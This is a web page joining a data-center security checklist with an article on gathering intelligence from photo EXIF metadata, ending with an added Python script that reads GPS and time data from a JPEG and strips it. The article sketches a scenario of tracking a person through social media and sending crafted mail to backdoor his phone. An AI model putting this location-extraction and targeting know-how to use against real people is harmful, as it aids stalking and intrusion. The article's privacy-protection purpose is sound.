Understand Who is Accessing your Data Center

The mission of the data center is to serve up applications to users. These users can range from employees and external business partners to contractors, all of whom can access data center applications from a multitude of devices such as tablets and mobile devices. Understanding who is accessing these applications, and how they are accessing them, is critical in designing your data center to ensure that you are planning for securing their access. Plan for your security solution to integrate into your user repository so that you can enforce access policies based on users instead of IP addresses, and incorporate user information in reports and dashboards. Consider subscribing to Forrester Research Analyst John Kindervag’s Zero Trust philosophy (“do not trust, always verify”) of least privilege, where access control is strictly enforced, and minimal privileges allowed.

Prepare for Threats in Your Virtualized Data Center

Virtualization-specific security threats and vulnerabilities have been well documented. Because the virtualized server is made up of many different components, from hypervisor to guest operating system and application, each of these components needs to be secured to ensure protection for the virtualized environment. But you still need to address other threats that you might see in a traditional data center. For example, an Internet-facing virtualized data center may see denial-of-service attacks or automated script-kiddie attacks, while enterprise-facing virtualized data centers may see patient, multi-step intrusions leveraging a variety of different threat vectors. By understanding the threats to your specific data center, you can better prepare to handle them.

Segment Your Virtualized Data Center

As you build your virtualized data center network, the fundamental security best practice is to segment. Segmentation in the enterprise data center can ensure that vulnerable parts of the data center are isolated from other parts of the network, or that specific servers that need to comply with regulatory requirements are segmented to manage risks and reduce compliance auditing scope. It can also limit the extent of damage to your data center if a hacker breaches a part of your data center. Segmentation is the best practice even in flat, layer two networks.

You should logically group systems that share similar risk factors and security classifications. For example, all common infrastructure services in the data center such as Active Directory or NTP servers are sometimes the most vulnerable and critical, because they can typically communicate with all other services. These common services must be segmented from other server tiers. Virtualized servers must be segmented appropriately based on attributes such as similar risk factors and security classification. These servers can be placed in security zones, and traffic between security zones should be selectively permitted in line with security policy and access control requirements. It is critical that segmentation be enabled by a next-generation firewall rather than VLANs or switch ACLs. Only next-generation firewalls that deliver segmentation based on user and applications instead of port and IP will be effective in securing a virtualized data center environment.

Summary – Evolve Securing Your Infrastructure as Your Infrastructure Evolves

This top 5 list by no means addresses all of your design considerations in building security into your virtualized data center. But, it’s a start. And unfortunately, unlike the Alice in Wonderland story, there is no ending to your security considerations. Just like a security policy is a living document that will continually be reviewed and adjusted based on new business objectives, your security considerations will continue to evolve as the application and threat landscape changes.

Source
-
Welcome aboard!
-
Reconnaissance with Images

Gathering data on a target is extremely important if we plan to execute an attack in a more efficient manner. A typical attack scenario starts with a long reconnaissance process. In this case “reconnaissance” refers to the gathering of information in any and all possible manners regarding a particular object of interest. We can gather information from websites online, dumpster-diving offline, and also through the classic act of social engineering.

Online information gathering emerged after millions of people all over the world started participating in social networking sites like Orkut, Facebook, Twitter etc. People started to maintain a virtual image of themselves, which may, or may not, be similar to their real-world image. In this article, we shall see the social implications of these dual personas and how they can lead to the exploitation of vanity. We shall also look into how someone’s life can be affected and the risks of geo-localization. This article also features various tools used to perform reconnaissance with images.

Social networks like Twitter, Facebook etc. are exploiting human vanity. The Y2K syndrome highlighted global fears that there might be something out in the virtual universe that would take control of our lives—something like the implantation of GPS chips in our skin, for example. Well, it’s not “something” that takes control of our lives; instead, we ourselves blithely send out various pieces of personal information in an attempt to project ourselves as something special within the virtual universe.

A Classic Example of Information Leakage Through Social Networking Sites

In the above image, we can glean a lot of indirect information regarding the whereabouts of the person. Mr. XYZ was at “Annamalai International Hotel” in a place called “Pondicherry” eight hours ago, and he is using a Windows phone! It’s well known that the interface shown in the above image is from Facebook.

Possible Attack Scenario:

It’s a reasonably valid assumption that this person uses his mobile device to check email, and to access other online accounts. Suppose I am his friend on the social networking site. Through a socially engineered attack, I can gather information regarding his habits and other personal updates by monitoring the feeds on the site. In addition, because his email ID is listed in his profile, I can probably send him a crafted mail that can gain me backdoor access to his phone through the available exploits. Or I can potentially steal his credentials; the possibilities depend on my creativity. The scenario above provides just one example where an image can speak for the individual.

EXIF Data and Images:

Smartphones and digital cameras (including scanners) use a standard format for images and recorded sounds. This standard is called exchangeable image file format. This information may include details about the camera model, shutter speed, focal length, etc. Most importantly, it contains GPS information about where the image was taken. By default almost all smartphones have GPS data activated. The camera setup asks the user to set it during the pre-initial setup. People tend not to remember to wipe off the GPS location data for every photo they shoot. Thus, GPS information is embedded in almost all images taken.

Social and Security Issues

When a member of the press who releases an interview with a hacker (or another wanted criminal) offers a promise of anonymity during the telecast, that offer is not always valid. Any image that is uploaded from the interview might help an investigation by allowing examiners to track the GPS location where the image was taken. An untrained member of the press staff who publishes the image on the net might not be aware of the fact that he should have stripped off the EXIF data that’s hidden in the image.

With this background, let’s see various online and offline tools to extract metadata from an image:

Jeffrey’s Exif viewer
Type of tool: Online
URL: Jeffrey's Exif viewer
Figure: Input options to the tool
Figure: Basic information provided by the viewer

This is a very basic EXIF data viewer. It shows the specifications of an image with respect to the camera. The information gained from this tool tells us the date and time when the image was taken. It also tells us which camera has been used for the image. This information is vital if we are going to find a lost camera belonging to a particular person. If we have a database of EXIF data from public images on the internet, a lost camera can be found by comparing the EXIF data of the owner’s image and the stolen image.

EXIFDATA.COM
Type of tool: Online
URL: EXIF Data Viewer
Figure: Input interface of this tool
Figure: Metadata shown

This tool offers a lot of details and can be considered advanced. It reveals every tiny bit of metadata found embedded in the images, as you can see from the above example—that image was taken from an Apple iPhone 4. Such easily available information will definitely make any attack very efficient.

In the image below we see the geo-localization of information. As mentioned before, the default settings of smartphones keep the GPS settings switched ON. As a result, when an image is taken, its geo-local information (like longitude, latitude, and height above sea level) gets embedded in the image. This comes in very handy when trying to pinpoint the exact location of a criminal who might be absconding from the law.

Figure: GPS position exactly displayed

Opanda IExif Tool
Type of tool: Freeware
Download URL: Exif viewer : Opanda IExif - Professional EXIF / GPS / IPTC Viewer & Editor in Windows, IE & Firefox
Figure: Summary of metadata on Opanda

Opanda is a very advanced tool. It allows for the categorization of various kinds of metadata that can be found in an image. It categorizes data into GPS and IPTC sections. The summary includes all the details, and this tool is very organized compared to all other tools. It also delivers optimum performance with respect to various images. One added advantage of this tool is that it also allows us to edit EXIF data within the image. This is very helpful when we would want to strip off the metadata. We can either change and mask our information, or delete the information altogether.

Windows Image Property Viewer
Tool type: general, built-in operating system feature
Figure: The above figure shows how to strip off general metadata

This method for viewing metadata is designed for a layman who isn’t very adept at using advanced tools and technology. These interfaces also don’t strip off a huge amount of metadata information like Opanda. Thus, this is one of the least used methods when it comes to stripping or viewing EXIF data.

Writing a Custom PHP Script:

The following image shows a script in PHP which will capture the EXIF data from an image. It returns the time and date when the image was taken, the GPS coordinates of the location where the image was taken, and also tries to read from the headers of the image.

Conclusion

In this article we have reviewed the hidden information that pictures can reveal to a forensic expert. Undoubtedly, hidden metadata provides the truth in the age-old quote: “A picture is worth a thousand words.” I have tried my best to show you both faces of the coin, i.e. the advantages to both reading the metadata and also to stripping off the metadata. As many people spend time projecting a new virtual image onto the public Internet, they are unaware of just how much information they are unintentionally revealing about themselves. A stalker can find all this information and can still trouble you and invade your privacy. Thus any uploading interface should be embedded with scripts to strip the image being uploaded of metadata so that the user’s privacy is not compromised.

With these words, I advise all readers to keep a close watch on the amount of information you reveal online.

Source
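The PHP script the post refers to is shown only as an image there; as an added example that is not part of the original post, the following Python reads the DateTime and GPS fields straight out of a JPEG's Exif APP1 segment (TIFF header, IFD0, GPS IFD) and also strips that segment, the step the post recommends for any upload interface. The JPEG bytes, the timestamp and the coordinates are constructed for the demo, not taken from a real photo.

```python
import struct

TAG_DATETIME, TAG_GPS_IFD = 0x0132, 0x8825                  # IFD0 tags from the EXIF spec
TAG_LAT_REF, TAG_LAT, TAG_LON_REF, TAG_LON = 0x0001, 0x0002, 0x0003, 0x0004  # GPS IFD tags
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8}                  # BYTE, ASCII, SHORT, LONG, RATIONAL
EXIF_MAGIC = b"Exif\0\0"                                      # prefix of an Exif APP1 payload

def jpeg_segments(data):
    """Yield (marker, raw segment) for each marker segment, then (None, rest) at the scan."""
    assert data[:2] == b"\xff\xd8", "not a JPEG"
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF and data[pos + 1] != 0xDA:
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        yield data[pos + 1], data[pos:pos + 2 + length]
        pos += 2 + length
    yield None, data[pos:]

def read_ifd(tiff, offset, bo):
    """Decode one IFD into {tag: value}: ASCII -> str, RATIONAL -> floats, SHORT/LONG -> int."""
    out = {}
    for i in range(struct.unpack(bo + "H", tiff[offset:offset + 2])[0]):
        e = offset + 2 + 12 * i
        tag, typ, n = struct.unpack(bo + "HHI", tiff[e:e + 8])
        size = TYPE_SIZES[typ] * n
        # Values of at most 4 bytes sit inline; longer ones are reached through an offset.
        start = e + 8 if size <= 4 else struct.unpack(bo + "I", tiff[e + 8:e + 12])[0]
        raw = tiff[start:start + size]
        if typ == 2:
            out[tag] = raw.rstrip(b"\0").decode("ascii", "replace")
        elif typ == 5:
            nums = struct.unpack(bo + "II" * n, raw)
            out[tag] = tuple(a / b if b else 0.0 for a, b in zip(nums[::2], nums[1::2]))
        elif typ in (3, 4):
            out[tag] = struct.unpack(bo + "HI"[typ - 3], raw[:TYPE_SIZES[typ]])[0]
    return out

def to_degrees(dms, ref):
    d, m, s = dms                                   # (degrees, minutes, seconds) RATIONALs
    return (d + m / 60 + s / 3600) * (-1 if ref in ("S", "W") else 1)

def extract_exif(jpeg):
    """Return capture time and signed decimal GPS position from the Exif segment, or None."""
    for marker, seg in jpeg_segments(jpeg):
        if marker != 0xE1 or seg[4:10] != EXIF_MAGIC:
            continue
        tiff = seg[10:]
        bo = "<" if tiff[:2] == b"II" else ">"     # "II" little-endian TIFF, "MM" big-endian
        ifd0 = read_ifd(tiff, struct.unpack(bo + "I", tiff[4:8])[0], bo)
        info = {"datetime": ifd0.get(TAG_DATETIME)}
        if TAG_GPS_IFD in ifd0:
            gps = read_ifd(tiff, ifd0[TAG_GPS_IFD], bo)
            info["lat"] = to_degrees(gps[TAG_LAT], gps[TAG_LAT_REF])
            info["lon"] = to_degrees(gps[TAG_LON], gps[TAG_LON_REF])
        return info
    return None

def strip_exif(jpeg):
    """Drop every Exif APP1 segment: what an upload handler should do before a photo goes public."""
    keep = (s for m, s in jpeg_segments(jpeg) if not (m == 0xE1 and s[4:10] == EXIF_MAGIC))
    return b"\xff\xd8" + b"".join(keep)

def sample_jpeg():
    """Constructed minimal JPEG (no picture data) with a big-endian Exif block; values are made up."""
    ifd = lambda es: struct.pack(">H", len(es)) + b"".join(
        struct.pack(">HHI", t, ty, n) + v for t, ty, n, v in es) + b"\0\0\0\0"
    off = lambda o: struct.pack(">I", o)
    # Layout: header @0, IFD0 @8 (30 B), GPS IFD @38 (54 B), lat @92, lon @116, date @140
    tiff = b"MM\0\x2a" + off(8)
    tiff += ifd([(TAG_DATETIME, 2, 20, off(140)), (TAG_GPS_IFD, 4, 1, off(38))])
    tiff += ifd([(TAG_LAT_REF, 2, 2, b"N\0\0\0"), (TAG_LAT, 5, 3, off(92)),
                 (TAG_LON_REF, 2, 2, b"E\0\0\0"), (TAG_LON, 5, 3, off(116))])
    tiff += struct.pack(">6I", 11, 1, 55, 1, 48, 1) + struct.pack(">6I", 79, 1, 49, 1, 48, 1)
    tiff += b"2012:07:28 09:30:00\0"               # 11 deg 55' 48" N, 79 deg 49' 48" E, DateTime
    # APP1 length counts its own two bytes plus the 6-byte Exif prefix; then a fake SOS and EOI.
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(tiff) + 8) + EXIF_MAGIC + tiff + b"\xff\xda\0\x02\0\xff\xd9"
```

Real cameras usually put DateTimeOriginal in the Exif sub-IFD (tag 0x8769) rather than IFD0; the same read_ifd call follows that pointer exactly as it follows the GPS one.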
-